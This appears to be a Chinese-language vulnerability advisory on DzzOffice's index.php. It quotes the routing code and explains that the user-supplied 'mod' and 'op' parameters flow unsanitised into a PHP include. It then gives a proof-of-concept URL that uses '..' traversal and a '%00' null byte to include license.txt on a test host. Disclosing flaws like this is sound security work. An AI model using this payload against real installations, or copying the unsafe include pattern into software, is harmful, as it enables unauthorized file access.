<ul><li>Index.php</li></ul><pre class="">$dzz = C::app(); $mod = getgpc('mod'); $mod = !empty($mod) ? $mod : ''; $op = !empty($_GET['op']) ? $_GET['op'] : 'index'; $cachelist = array(); $dzz->cachelist = $cachelist; $dzz->init(); //调用各自的模块 if(empty($mod)){ if($_G['uid']<1 && $_G['setting']['loginset']['available']){ @header("Location: user.php?mod=logging"); exit(); } define('CURMODULE', 'dzzindex'); require DZZ_ROOT.'./dzz/index.php'; }else{ define('CURMODULE', str_replace(':','/',$mod)); if(strpos(strtolower($mod),':')!==false){ $modfile='./dzz/'.str_replace(':','/',$mod).'/'.($op?$op:'index').'.php'; //exit(DZZ_ROOT.$modfile); if(@!file_exists(DZZ_ROOT.$modfile)){ showmessage($modfile.lang('message','file_nonexistence',array('modfile'=>$modfile))); } }else{ if(@!file_exists(DZZ_ROOT.($modfile = './dzz/'.$mod.'/'.$op.'.php'))) { showmessage('undefined_action', '', array('mod' => $mod)); } } include DZZ_ROOT.$modfile; }...
<ul><li>Index.php</li></ul><pre class="">$dzz = C::app(); $mod = getgpc('mod'); $mod = !empty($mod) ? $mod : ''; $op = !empty($_GET['op']) ? $_GET['op'] : 'index'; $cachelist = array(); $dzz->cachelist = $cachelist; $dzz->init(); //调用各自的模块 if(empty($mod)){ if($_G['uid']<1 && $_G['setting']['loginset']['available']){ @header("Location: user.php?mod=logging"); exit(); } define('CURMODULE', 'dzzindex'); require DZZ_ROOT.'./dzz/index.php'; }else{ define('CURMODULE', str_replace(':','/',$mod)); if(strpos(strtolower($mod),':')!==false){ $modfile='./dzz/'.str_replace(':','/',$mod).'/'.($op?$op:'index').'.php'; //exit(DZZ_ROOT.$modfile); if(@!file_exists(DZZ_ROOT.$modfile)){ showmessage($modfile.lang('message','file_nonexistence',array('modfile'=>$modfile))); } }else{ if(@!file_exists(DZZ_ROOT.($modfile = './dzz/'.$mod.'/'.$op.'.php'))) { showmessage('undefined_action', '', array('mod' => $mod)); } } include DZZ_ROOT.$modfile; } </pre><p>程序将用户输入的字符经过拼接后直接带入include导致文件包含漏洞。</p><p>当访问:</p><pre class="">http://10.211.55.4/dzzoffice/index.php?mod=admin:..:..&op=license.txt%00</pre><p>发现包含了目录下的license.txt </p><p><img alt="D3C93EA5-BBDE-4727-8D67-2688CA79D089.png" src="https://images.seebug.org/@/uploads/1434694369180-D3C93EA5-BBDE-4727-8D67-2688CA79D089.png" data-image-size="988,267"><br></p>
